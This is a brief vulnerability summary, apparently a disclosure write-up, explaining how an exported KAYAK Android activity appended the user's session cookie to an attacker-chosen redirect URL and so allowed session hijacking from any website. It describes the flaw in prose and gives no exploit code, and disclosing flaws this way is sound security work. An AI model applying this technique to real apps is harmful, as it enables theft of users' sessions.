Starts off with an exposed activity in the KAYAK app, ends up with session hijacking.
The exposed activity was the
ExternalAuthLoginActivity it could be called from any application/website. That isn’t necessarily a problem, but one of the things this activity does is it will attempt to read an
EXTRA_REDIRECT_URL from the intent, append a parameter to the URL containing the user’s KAYAK session cookie value.
So any malicious website could launch this intent, and recieve a callback with valid session cookies for KAYAK.